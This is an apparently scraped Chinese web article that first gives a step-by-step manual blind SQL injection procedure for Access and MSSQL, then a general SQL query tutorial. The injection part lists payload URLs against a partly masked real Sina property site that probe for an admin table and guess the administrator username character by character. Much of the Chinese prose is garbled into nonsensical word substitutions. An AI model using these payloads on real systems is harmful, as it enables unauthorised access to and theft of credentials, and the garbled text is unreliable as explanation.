ACCESSJSP手动注入 全

检测是否注入

http://\*\*\*\*.house.sina.com.cn/publics/detail.jsp?id=7674 and 1=1
(正常页面)

http://\*\*\*\*.house.sina.com.cn/publics/detail.jsp?id=7674 and 1=2
(出错页面)

检测表段的

http://\*\*\*\*.house.sina.com.cn/publics/detail.jsp?id=7674 and exists
(select * from admin)

检测字段的

http://\*\*\*\*.house.sina.com.cn/publics/detail.jsp?id=7674 and exists
(select username from admin)

检测ID

http://\*\*\*\*.house.sina.com.cn/publics/detail.jsp?id=7674 and exists
(select id from admin where ID=1)

检测长的

http://\*\*\*\*.house.sina.com.cn/publics/detail.jsp?id=7674 and exists
(select id from admin where len(username)=5 and ID=1)

检测长的

http://\*\*\*\*.house.sina.com.cn/publics/detail.jsp?id=7674 and exists
(select id from admin where len(username)=5 and ID=1)

检测是否也MSSQL数据库

http://\*\*\*\*.house.sina.com.cn/publics/detail.jsp?id=7674 and exists
(select * from sysobjects)

检测是否为英文

(ACCESS数据库)

http://\*\*\*\*.house.sina.com.cn/publics/detail.jsp?id=7674 and exists
(select id from admin where asc(mid(username,1,1)) between 30 and 130
and ID=1)

(MSSQL数据库)

http://\*\*\*\*.house.sina.com.cn/publics/detail.jsp?id=7674 and exists
(select id from admin where unicode(substring(username,1,1)) between 30
and 130 and ID=1)

检测英文的范围

(ACCESS数据库)

http://\*\*\*\*.house.sina.com.cn/publics/detail.jsp?id=7674 and exists
(select id from admin where asc(mid(username,1,1)) between 90 and 100
and ID=1)

(MSSQL数据库)

http://\*\*\*\*.house.sina.com.cn/publics/detail.jsp?id=7674 and exists
(select id from admin where unicode(substring(username,1,1)) between 90
and 100 and ID=1)

检测好字符

(ACCESS数据库)

http://\*\*\*\*.house.sina.com.cn/publics/detail.jsp?id=7674
and exists (select id from admin where asc(mid(username,1,1))=97 and
ID=1)

 

(MSSQL数据库)

http://\*\*\*\*.house.sina.com.cn/publics/detail.jsp?id=7674 and exists
(select id from admin where unicode(substring(username,1,1))=97 and
ID=1)

常用函数

Access:asc(字符) SQLServer:unicode(字符)

意:返回某字符的ASCII码

Access:chr(数字) SQLServer:nchar(数字)

图:与asc相反,根据ASCII码返回字符

Access:mid(字符串,N,L) SQLServer:substring(字符串,N,L)

打算:返回字符串从N个字符起长度也L的子字符串,即N到N+L之间的字符串

Access:abc(数字) SQLServer:abc (数字)

意:返回数字的绝对值(在猜解汉字的时段会就此到)

Access:A between B And C SQLServer:A between B And C

打算:判断A是否界于B与C之间

and exists(Select top 1 * From 用户 order by id)

1.当查询结果丁展示列名:

a.用as关键字:select name as ’姓名’ from students order by age

b.直接代表:select name ’姓名’ from students order by age

2.准儿查找:

a.用in限定范围:select * from students where native in (’湖南’, ’四川’)

b.between…and:select * from students where age between 20 and 30

c.“=”:select * from students where name = ’李山’

d.like:select * from students where name like ’李%’
(注意查询条件中有“%”,则印证是一些匹配,而且还有先后信息以中,即找以“李”开头的匹配项。所以要查询有“李”的有目标,应该命令:’%李%’;若是第二单字为李,则答应为’_李%’或’_李’或’_李_’。)

e.[]配合检查符:select * from courses where cno like ’[AC]%’
(表示或的涉,与”in(…)”类似,而且”[]”可以代表范围,如:select *
from courses where cno like ’[A-C]%’)

3.于日项目变量的处理

a.smalldatetime:直接以字符串处理的方法进行处理,例如:select * from
students where birth > = ’1980-1-1’ and birth <= ’1980-12-31’

4.集函数

a.count()求和,如:select count(*) from students (求学生总人数)

b.avg(列)求平均,如:select avg(mark) from grades where cno=’B2’

c.max(列)和min(列),求最好充分及顶小

5.分组group

每每用来统计时,如分组查总数:select gender,count(sno) from students group
by gender(查看男女学生各发小)

留神:从哪种角度分组就由哪列”group by”

于多再分组,只待将分组规则罗列。比如查询各到各专业的儿女同校人数
,那么分组规则来:届别(grade)、专业(mno)和

性别(gender),所以有”group by grade, mno, gender”

select grade, mno, gender, count(*) from students group by grade, mno,
gender

普通group还同having联用,比如查询1门课上述无过关的生,则依照学号(sno)分类有:

select sno,count(*) from grades where mark<60 group by sno having
count(*)>1

6.UNION联合

集合查询结果,如:

Select * FROM students Where name like ‘张%’UNION [ALL] Select *
FROM students Where name like ‘李%’

7.多表查询

a.内连接

select g.sno,s.name,c.coursename from grades g JOIN students s ON
g.sno=s.sno JOIN courses c ON g.cno=c.cno

(注意得引用别名)

b.外连接

b1.左连接

select courses.cno,max(coursename),count(sno) from courses LEFT JOIN
grades ON courses.cno=grades.cno group by courses.cno

张冠李戴连接特点:显示所有左手表中的有所类型,即使其中多少项中之数目不填写了。

左外连接返回那些有吃左表而右表中倒从不底履,再长内连续的尽。

b2.右连接

跟谬误连接类似

b3.全连接

select sno,name,major from students FULL JOIN majors ON
students.mno=majors.mno

点滴限表中的内容尽显得

c.自身连接

select c1.cno,c1.coursename,c1.pno,c2.coursename from courses c1,courses
c2 where c1.pno=c2.cno

动用别名解决问题。

d.交*连接

select lastname+firstname from lastname CROSS JOIN firstanme

一定给做笛卡儿积

8.嵌套询问

a.用关键字IN,如查询猪猪山的同乡:

select * from students where native in (select native from students
where name=’猪猪’)

b.用要字EXIST,比如,下面两句是当价格的:

select * from students where sno in (select sno from grades where
cno=’B2’)

select * from students where exists (select * from grades where
grades.sno=students.sno AND cno=’B2’)

9.关于排序order

a.对于排序order,有一定量种植艺术:asc升序和desc降序

b.于排序order,可以遵循查询条件中之某项排列,而且这项可用数字代表,如:

select sno,count(*) ,avg(mark) from grades group by sno having
avg(mark)>85 order by 3

10.其他

a.对于发生空格的辨识号,应该用”[]”括住。

b.于某列中从来不多少的特定查询好就此null判断,如select sno,courseno from
grades where mark IS NULL

c.注意区分以嵌套查询中应用的any与all的区分,any相当给逻辑运算“||”而all则一定给逻辑运算“&&”

d.注意在举行否定意义之询问是小心上陷阱:

倘若,没有选修‘B2’课程的学童 :

select students.* from students, grades where students.sno=grades.sno
AND grades.cno <> ’B2’

面的询问艺术是谬误的,正确方法见下方:

select * from students where not exists (select * from grades where
grades.sno=students.sno AND cno=’B2’)

11.有关发生难度多又嵌套查询的化解思想:如,select * from students where
not exists (select * from courses where NOT EXISTS (select * from
grades where sno=students.sno AND cno=courses.cno))

最外一更:从学生说明中选择,排除那些有征从不选择的。用not
exist。由于讨论对象是课程,所以亚再次查询从course表中寻找,排除那些选择了征的即可

相关文章